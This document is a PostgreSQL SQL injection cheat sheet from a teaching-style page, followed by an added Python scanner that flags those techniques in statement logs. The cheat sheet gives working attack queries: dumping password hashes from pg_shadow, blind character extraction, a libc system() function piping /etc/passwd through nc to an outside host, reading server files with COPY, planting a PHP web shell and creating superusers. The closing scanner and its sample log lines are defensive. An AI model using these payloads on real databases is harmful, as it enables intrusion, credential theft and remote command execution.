IT-Academy

SQL Injections

Dec 12th, 2017
Version
SELECT version();

Comments
SELECT 1; --comment
SELECT /*comment*/1;

Current User
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

List Users
SELECT usename FROM pg_user;

List Password Hashes
SELECT usename, passwd FROM pg_shadow; -- priv

Password Cracker
MDCrack can crack PostgreSQL's MD5-based passwords.

List Privileges
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user;

List DBA Accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE;

Current Database
SELECT current_database();

List Databases
SELECT datname FROM pg_database;

List Columns
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public');

List Tables
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid);

Find Tables From Column Name
If you want to list all the table names that contain a column LIKE '%password%':
SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';

Select Nth Row
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; -- rows numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

Select Nth Char
SELECT substr('abcd', 3, 1); -- returns c

Bitwise AND
SELECT 6 & 2; -- returns 2
SELECT 6 & 1; -- returns 0

ASCII Value -> Char
SELECT chr(65);

Char -> ASCII Value
SELECT ascii('A');

Casting
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);

String Concatenation
SELECT 'A' || 'B'; -- returns AB

If Statement
IF statements only seem valid inside functions, so aren't much use for SQL injection. See CASE statement instead.

Case Statement
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A

Avoiding Quotes
SELECT CHR(65)||CHR(66); -- returns AB

Time Delay
SELECT pg_sleep(10); -- postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' LANGUAGE 'C' STRICT; SELECT sleep(10); -- priv, create your own sleep function. Taken from here.

Make DNS Requests
Generally not possible in postgres. However, if contrib/dblink is installed (it isn't by default) it can be used to resolve hostnames (assuming you have DBA rights):
SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') AS t(result TEXT);
Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. "ping pentestmonkey.net".

Command Execution
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; -- priv
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as postgres/pgsql OS-level user

Local File Access
CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd'; -- priv, can read files which are readable by postgres OS-level user
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; -- get data back one row at a time
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; -- get data back one row at a time
DROP TABLE mydata;

Write to a file:
CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('<? pasthru($_GET[cmd]); ?>');
COPY mytable (mycol) TO '/tmp/test.php'; -- priv, write files as postgres OS-level user. Generally you won't be able to write to the web root, but it's always worth a try.
-- priv user can also read/write files by mapping libc functions

Hostname, IP Address
SELECT inet_server_addr(); -- returns db server IP address (or null if using local connection)
SELECT inet_server_port(); -- returns db server port (or null if using local connection)

Create Users
CREATE USER test1 PASSWORD 'pass1'; -- priv
CREATE USER test1 PASSWORD 'pass1' CREATEUSER; -- priv, grant some privs at the same time

Drop Users
DROP USER test1; -- priv

Make User DBA
ALTER USER test1 CREATEUSER CREATEDB; -- priv

Location of DB files
SELECT current_setting('data_directory'); -- priv
SELECT current_setting('hba_file'); -- priv

Default/System Databases
template0
template1
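Added here as a defensive example (not part of the paste): a Python scanner that runs over constructed PostgreSQL statement-log lines and flags the primitives listed above (pg_sleep, ascii/substr extraction, pg_shadow, COPY file access, C-language UDFs, dblink, data_directory/hba_file probes, CREATEUSER/SUPERUSER grants), first decoding chr()||chr() chains so the "Avoiding Quotes" trick cannot hide a literal from the rules. It assumes logs written with log_statement = 'all'; the rule names and sample log lines are this example's own, not a PostgreSQL API.

```python
import re

# With log_statement = 'all', PostgreSQL logs "... LOG:  statement: <sql>".
_STMT = re.compile(r"statement:\s*(.*)$")
# chr(65)||chr(66) chains are the quote-avoidance trick listed above.
_CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*\|\|\s*chr\(\s*\d+\s*\))*", re.I)

# Rule name -> pattern for the primitives the cheat sheet relies on (example's own choice).
RULES = {
    "time-based blind (pg_sleep)": r"\bpg_sleep\s*\(",
    "char-by-char extraction": r"\bascii\s*\(\s*substr\s*\(",
    "password hash read": r"\bpg_shadow\b",
    "file access via COPY": r"\bCOPY\b.+\b(?:FROM|TO)\s+'",
    "native C function (UDF)": r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.+\bLANGUAGE\s+'?C\b",
    "dblink call": r"\bdblink\s*\(",
    "server config probe": r"current_setting\s*\(\s*'(?:data_directory|hba_file)'",
    "privilege escalation": r"\b(?:CREATE|ALTER)\s+USER\b.+\b(?:CREATEUSER|SUPERUSER)\b",
}
_COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES.items()]

def decode_chr_chains(sql):
    """Replace each chr(n)||chr(m)... chain with the quoted literal it builds."""
    def repl(m):
        codes = re.findall(r"chr\(\s*(\d+)\s*\)", m.group(0), re.I)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return _CHR_CHAIN.sub(repl, sql)

def scan_log(log_text):
    """Return (line_no, rule_name, decoded_sql) for every statement matching a rule."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = _STMT.search(line)
        if not m:
            continue
        sql = decode_chr_chains(m.group(1))  # normalise before matching
        for name, rx in _COMPILED:
            if rx.search(sql):
                hits.append((n, name, sql))
    return hits

# Constructed sample log (not real traffic): one benign query, then probes built
# from the primitives above; the last one hides 'hba_file' behind chr() calls.
LOG_SAMPLE = """\
2017-12-12 10:00:01 UTC [4021] LOG:  statement: SELECT id, name FROM products WHERE id = 42
2017-12-12 10:00:02 UTC [4021] LOG:  statement: SELECT id FROM products WHERE id = 42 AND (SELECT ascii(substr(usename,1,1)) FROM pg_user LIMIT 1 OFFSET 0) & 64 = 64
2017-12-12 10:00:03 UTC [4021] LOG:  statement: SELECT id FROM products WHERE id = 42; SELECT pg_sleep(10)
2017-12-12 10:00:04 UTC [4021] LOG:  statement: SELECT usename, passwd FROM pg_shadow
2017-12-12 10:00:05 UTC [4021] LOG:  statement: COPY mydata FROM '/etc/passwd'
2017-12-12 10:00:06 UTC [4021] LOG:  statement: SELECT current_setting(CHR(104)||CHR(98)||CHR(97)||CHR(95)||CHR(102)||CHR(105)||CHR(108)||CHR(101))
"""
```

Calling scan_log(LOG_SAMPLE) reports lines 2 to 6, the last as a server config probe on the decoded 'hba_file' literal; the pg_class/pg_user catalogue queries are deliberately not rules because ORMs issue them routinely.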